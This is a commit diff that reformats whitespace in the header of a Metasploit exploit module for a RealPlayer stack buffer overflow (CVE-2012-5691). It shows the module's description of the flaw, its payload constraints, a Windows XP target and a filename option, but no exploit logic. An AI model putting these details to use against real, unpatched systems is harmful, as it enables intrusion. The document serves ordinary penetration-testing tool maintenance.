Fix weird tabs vs spaces prob
parent
e895ccb6b1
commit
0b2ea3e55e
|
@ -15,8 +15,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'RealPlayer File Handling Buffer Overflow',
|
||||
'Description' => %q{
|
||||
'Name' => 'RealPlayer File Handling Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack based buffer overflow on RealPlayer <=15.0.6.14.
|
||||
The vulnerability exists in the handling of real media files, due to the insecure
|
||||
usage of the GetPrivateProfileString function to retrieve the URL property from an
|
||||
|
@ -26,12 +26,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
drag and drop or double click methods. It has been tested successfully on Windows
|
||||
XP SP3 with RealPlayer 15.0.5.109.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'suto <suto[at]vnsecurity.net>' # Vulnerability discovery, metasploit module
|
||||
],
|
||||
'References' =>
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2012-5691' ],
|
||||
[ 'OSVDB', '88486' ],
|
||||
|
@ -42,14 +42,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
{
|
||||
'ExitFunction' => 'process'
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Payload' =>
|
||||
'Platform' => 'win',
|
||||
'Payload' =>
|
||||
{
|
||||
'BadChars' => "\x00\x0a\x0d",
|
||||
'DisableNops' => true,
|
||||
'Space' => 2000
|
||||
},
|
||||
'Targets' =>
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows XP SP3 / Real Player 15.0.5.109',
|
||||
{
|
||||
|
@ -59,9 +59,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
}
|
||||
]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Dec 14 2012',
|
||||
'DefaultTarget' => 0))
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.rm']),], self.class)
|
||||
|
||||
|
|
Loading…
Reference in New Issue